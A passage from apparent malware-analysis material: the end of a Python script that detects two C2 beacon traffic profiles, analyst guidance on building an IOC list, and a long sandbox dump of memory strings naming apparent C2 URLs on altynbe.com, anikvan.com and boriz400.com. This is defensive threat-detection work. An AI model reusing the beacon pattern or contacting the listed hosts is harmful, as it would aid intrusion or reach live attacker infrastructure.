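    # so the UA alone is enough; the POST to /live/ is the full observed shape.
    if "Tob 1.1" in ua:
        return "tob11_post_live" if (method, path) == ("POST", "/live/") else "tob11_user_agent"
    # Profile 2: the fixed Chrome/90 UA, a POST to /api/azure or /content.php, and
    # none of the Accept / Content-Type headers a real browser form post sends.
    if (method == "POST" and path in BEACON_PATHS and ua == UA_CHROME90
            and "accept" not in h and "content-type" not in h):
        return "chrome90_headless_post"
    return None


def scan(records):
    """Return [(profile, host, path, content_length)] for every matching record."""
    hits = []
    for rec in records:
        profile = classify(rec)
        if profile is None:
            continue
        _, path, h = parse_record(rec)
        hits.append((profile, h.get("host", "?"), path, h.get("content-length", "?")))
    return hits


def hosts_by_profile(hits):
    """Collapse hits into the set of contacted hosts per profile (a first IOC list)."""
    out = {}
    for profile, host, _, _ in hits:
        out.setdefault(profile, set()).add(host)
    return out


def recurring_sizes(hits, min_hosts=2):
    """Content-Length values seen on several hosts under one profile.

    A constant-size check-in repeated across C2 hosts (154 bytes in the report)
    is a beacon tell that survives a change of domain or path.
    """
    hosts_per_size = {}
    for profile, host, _, length in hits:
        hosts_per_size.setdefault((profile, length), set()).add(host)
    return {k: sorted(v) for k, v in hosts_per_size.items() if len(v) >= min_hosts}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for hit in found:
        print(*hit)
    print(recurring_sizes(found))
```

Match on the combination, not on the Chrome/90 string alone: that User-Agent still turns up in legitimate traffic, whereas a POST to these paths that carries neither Accept nor Content-Type is not what a browser form submission produces. The two tyk.io names are subdomains of a commercial API-gateway service, so alert on the full hostname rather than the parent domain. The strings the report lists from explorer.exe memory (digicert, api.msn.com, aka.ms, assets.msn.com) belong to the injected host process itself and should not be carried into an IOC list; the rundll32.exe strings are the ones that name the C2 hosts.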
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                      Source: explorer.exe, 00000016.00000000.1850142884.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.1847476814.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2941807069.0000000007F40000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
                      Source: Amcache.hve.9.dr | String found in binary or memory: http://upx.sf.net
                      Source: explorer.exe, 00000016.00000000.1859052974.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C964000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C893000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/Vh5j3k
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/odirmr
                      Source: rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/
                      Source: rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/5~
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/=~
                      Source: rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/B_F
                      Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/U~
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/X
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/api/azure
                      Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/api/azureontent.phpMfE
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/api/azurep
                      Source: rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/api/azureure
                      Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/content.php
                      Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/content.php2f
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/d
                      Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/db-53011b87bd06
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/ic
                      Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://altynbe.com/tyk.io
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
                      Source: rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/
                      Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/I~
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/api/azure
                      Source: rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/api/azure==
                      Source: rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/api/azuret.php.f
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/content.php
                      Source: rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/content.php.f
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/content.phpGf
                      Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/d
                      Source: rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/db-53011b87bd06
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://anikvan.com/ic
                      Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
                      Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/q
                      Source: explorer.exe, 00000016.00000000.1845325737.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2938934418.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2937197092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: explorer.exe, 00000016.00000000.1847916203.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                      Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                      Source: explorer.exe, 00000016.00000000.1847916203.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.comi
                      Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                      Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                      Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                      Source: rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://boriz400.com/
                      Source: rundll32.exe, 00000012.00000003.2810418995.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921159E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.000002921159F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://boriz400.com/api/azure
                      Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://boriz400.com/api/azure8
